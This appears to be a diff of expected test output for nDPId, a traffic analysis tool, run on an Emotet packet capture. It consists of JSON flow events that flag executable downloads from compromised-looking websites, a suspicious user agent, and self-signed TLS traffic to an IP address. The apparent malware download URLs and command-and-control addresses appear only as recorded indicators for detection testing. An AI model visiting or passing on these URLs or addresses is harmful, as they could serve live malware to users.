{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"fkl.co.ke","url":"fkl.co.ke\/wp-content\/Elw3kPvOsZxM5\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.74 Safari\/537.36 Edg\/99.0.1150.55"}} -00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":831,"source":"emotet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":626,"flow_first_seen":1645830066121,"flow_last_seen":1645830085160,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":404645,"flow_avg_l4_payload_len":646,"midstream":0,"thread_ts_msec":1648563473087,"l3_proto":"ip4","src_ip":"10.2.25.102","dst_ip":"193.252.22.84","src_port":57309,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"}} -00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":835,"source":"emotet.pcap","alias":"nDPId-test","packets-captured":835,"packets-processed":834,"total-skipped-flows":0,"total-l4-payload-len":582320,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1650490398530} 
+00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"emotet.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648563468993,"flow_last_seen":1648563469109,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1648563469109,"l3_proto":"ip4","src_ip":"10.3.29.101","dst_ip":"104.161.127.22","src_port":56309,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"fkl.co.ke","url":"fkl.co.ke\/wp-content\/Elw3kPvOsZxM5\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.74 Safari\/537.36 Edg\/99.0.1150.55"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":831,"source":"emotet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":626,"flow_first_seen":1645830066121,"flow_last_seen":1645830085160,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":404645,"flow_avg_l4_payload_len":646,"midstream":0,"thread_ts_msec":1648563473087,"l3_proto":"ip4","src_ip":"10.2.25.102","dst_ip":"193.252.22.84","src_port":57309,"dst_port":587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"}} 
+00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":835,"source":"emotet.pcap","alias":"nDPId-test","packets-captured":835,"packets-processed":834,"total-skipped-flows":0,"total-l4-payload-len":582320,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1650490398530} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":835,"source":"emotet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1650490398530,"flow_last_seen":1650490398530,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1650490398530,"l3_proto":"ip4","src_ip":"10.4.20.102","dst_ip":"107.161.178.210","src_port":54319,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":835,"source":"emotet.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1650490398530,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1650490398530,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0\/mJAAIAGv4MKBBRma6Gy0tQvAFBRzVZmAAAAAIAC\/\/+1fwAAAgQFtAEDAwgBAQQC"} 
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":836,"source":"emotet.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1650490398627,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1650490398627,"pkt":"AAgCHEeuIOUqtpPxCABFAAAwAABAADIGC+trobLSCgQUZgBQ1C8M9mn7Uc1WZ3ASchDhvAAAAgQFbAEDAwc="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"emotet.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1650490398628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1650490398628,"pkt":"IOUqtpPxAAgCHEeuCABFAAAo\/mNAAIAGv44KBBRma6Gy0tQvAFBRzVZnDPZp\/FAQBAB7UAAAAAAAAAAA"} -00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":838,"source":"emotet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650490398530,"flow_last_seen":1650490398628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":225,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1650490398628,"l3_proto":"ip4","src_ip":"10.4.20.102","dst_ip":"107.161.178.210","src_port":54319,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"gandhitoday.org","url":"gandhitoday.org\/video\/6JvA8\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}} 
-00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":839,"source":"emotet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1650490398530,"flow_last_seen":1650490398888,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1650490398888,"l3_proto":"ip4","src_ip":"10.4.20.102","dst_ip":"107.161.178.210","src_port":54319,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"gandhitoday.org","url":"gandhitoday.org\/video\/6JvA8\/","code":200,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1664,"source":"emotet.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":208,"flow_first_seen":1648563468993,"flow_last_seen":1648563480808,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1361,"flow_tot_l4_payload_len":177675,"flow_avg_l4_payload_len":854,"midstream":0,"thread_ts_msec":1650490407650,"l3_proto":"ip4","src_ip":"10.3.29.101","dst_ip":"104.161.127.22","src_port":56309,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1664,"source":"emotet.pcap","alias":"nDPId-test","packets-captured":1664,"packets-processed":1663,"total-skipped-flows":0,"total-l4-payload-len":1352571,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":2,"total-updates":0,"current-active-flows":1,"total-active-flows":3,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":24,"global_ts_msec":1650905413858} +00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":838,"source":"emotet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650490398530,"flow_last_seen":1650490398628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":225,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1650490398628,"l3_proto":"ip4","src_ip":"10.4.20.102","dst_ip":"107.161.178.210","src_port":54319,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"gandhitoday.org","url":"gandhitoday.org\/video\/6JvA8\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}} +00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":839,"source":"emotet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1650490398530,"flow_last_seen":1650490398888,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1650490398888,"l3_proto":"ip4","src_ip":"10.4.20.102","dst_ip":"107.161.178.210","src_port":54319,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": 
{"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"gandhitoday.org","url":"gandhitoday.org\/video\/6JvA8\/","code":200,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1664,"source":"emotet.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":208,"flow_first_seen":1648563468993,"flow_last_seen":1648563480808,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1361,"flow_tot_l4_payload_len":177675,"flow_avg_l4_payload_len":854,"midstream":0,"thread_ts_msec":1650490407650,"l3_proto":"ip4","src_ip":"10.3.29.101","dst_ip":"104.161.127.22","src_port":56309,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1664,"source":"emotet.pcap","alias":"nDPId-test","packets-captured":1664,"packets-processed":1663,"total-skipped-flows":0,"total-l4-payload-len":1352571,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":3,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1650905413858} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1664,"source":"emotet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1650905413858,"flow_last_seen":1650905413858,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1650905413858,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"77.105.36.156","src_port":49797,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"emotet.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1650905413858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1650905413858,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0LKVAAIAGOLEKBBllTWkknMKFAFDxFWwgAAAAAIAC+vC+pQAAAgQFtAEDAwgBAQQC"} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1665,"source":"emotet.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1650905414042,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1650905414042,"pkt":"AAgCHEeuIOUqtpPxCABFAAA0AABAADEGtFZNaSScCgQZZQBQwoUpbDcH8RVsIYASOQggUwAAAgQFbAEBBAIBAwMH"} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1666,"source":"emotet.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1650905414043,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1650905414043,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoLKZAAIAGOLwKBBllTWkknMKFAFDxFWwhKWw3CFAQAgOX4gAAAAAAAAAA"} 
-00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1667,"source":"emotet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650905413858,"flow_last_seen":1650905414043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1650905414043,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"77.105.36.156","src_port":49797,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"filmmogzivota.rs","url":"filmmogzivota.rs\/SpryAssets\/gDR\/","code":0,"content_type":"","user_agent":"vBKbaQgjyvRRbcgfvlsc"}} -01062{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1669,"source":"emotet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1650905413858,"flow_last_seen":1650905414335,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":572,"flow_tot_l4_payload_len":724,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1650905414335,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"77.105.36.156","src_port":49797,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"filmmogzivota.rs","url":"filmmogzivota.rs\/SpryAssets\/gDR\/","code":200,"content_type":"application\/x-msdownload","user_agent":"vBKbaQgjyvRRbcgfvlsc"}} 
-00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2228,"source":"emotet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":829,"flow_first_seen":1650490398530,"flow_last_seen":1650490407650,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":770251,"flow_avg_l4_payload_len":929,"midstream":0,"thread_ts_msec":1650905415845,"l3_proto":"ip4","src_ip":"10.4.20.102","dst_ip":"107.161.178.210","src_port":54319,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1667,"source":"emotet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650905413858,"flow_last_seen":1650905414043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1650905414043,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"77.105.36.156","src_port":49797,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"filmmogzivota.rs","url":"filmmogzivota.rs\/SpryAssets\/gDR\/","code":0,"content_type":"","user_agent":"vBKbaQgjyvRRbcgfvlsc"}} 
+01062{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1669,"source":"emotet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1650905413858,"flow_last_seen":1650905414335,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":572,"flow_tot_l4_payload_len":724,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1650905414335,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"77.105.36.156","src_port":49797,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"filmmogzivota.rs","url":"filmmogzivota.rs\/SpryAssets\/gDR\/","code":200,"content_type":"application\/x-msdownload","user_agent":"vBKbaQgjyvRRbcgfvlsc"}} +00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2228,"source":"emotet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":829,"flow_first_seen":1650490398530,"flow_last_seen":1650490407650,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":770251,"flow_avg_l4_payload_len":929,"midstream":0,"thread_ts_msec":1650905415845,"l3_proto":"ip4","src_ip":"10.4.20.102","dst_ip":"107.161.178.210","src_port":54319,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2228,"source":"emotet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1650905467542,"flow_last_seen":1650905467542,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1650905467542,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49803,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2228,"source":"emotet.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1650905467542,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1650905467542,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0C55AAIAGrZIKBBllisWTZcKLAbv3Q1KhAAAAAIAC\/\/8fUQAAAgQFtAEDAwgBAQQC"} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2229,"source":"emotet.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1650905467652,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1650905467652,"pkt":"AAgCHEeuIOUqtpPxCABFAAA0AABAADAGCTGKxZNlCgQZZQG7wotH+MA690NSooAS+vAcZQAAAgQFbAEBBAIBAwMH"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2230,"source":"emotet.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1650905467652,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1650905467652,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoC59AAIAGrZ0KBBllisWTZcKLAbv3Q1KiR\/jAO1AQBABT4AAAAAAAAAAA"} 
-01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2231,"source":"emotet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650905467542,"flow_last_seen":1650905467666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1650905467666,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49803,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"51c64c77e60f3980eea90869b68c58a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01468{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2233,"source":"emotet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1650905467542,"flow_last_seen":1650905467789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1378,"flow_tot_l4_payload_len":1527,"flow_avg_l4_payload_len":254,"midstream":0,"thread_ts_msec":1650905467789,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49803,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"51c64c77e60f3980eea90869b68c58a8","ja3s":"ec74a5c51106f0419184d0dd08fb05bc","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=GB, ST=London, L=London, O=Global Security, OU=IT Department, CN=example.com","subjectDN":"C=GB, ST=London, L=London, O=Global Security, OU=IT Department, CN=example.com","fingerprint":"43:A2:39:73:AC:4D:2C:15:7B:D6:4E:32:EA:22:11:B7:97:65:1A:93"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2231,"source":"emotet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1650905467542,"flow_last_seen":1650905467666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1650905467666,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49803,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"51c64c77e60f3980eea90869b68c58a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01468{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2233,"source":"emotet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1650905467542,"flow_last_seen":1650905467789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1378,"flow_tot_l4_payload_len":1527,"flow_avg_l4_payload_len":254,"midstream":0,"thread_ts_msec":1650905467789,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49803,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"51c64c77e60f3980eea90869b68c58a8","ja3s":"ec74a5c51106f0419184d0dd08fb05bc","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=GB, ST=London, L=London, O=Global Security, OU=IT Department, CN=example.com","subjectDN":"C=GB, ST=London, L=London, O=Global Security, OU=IT Department, CN=example.com","fingerprint":"43:A2:39:73:AC:4D:2C:15:7B:D6:4E:32:EA:22:11:B7:97:65:1A:93"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2359,"source":"emotet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1650905469778,"flow_last_seen":1650905469778,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1650905469778,"l3_proto":"ip4","src_ip":"10.4.25.101","dst_ip":"138.197.147.101","src_port":49804,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 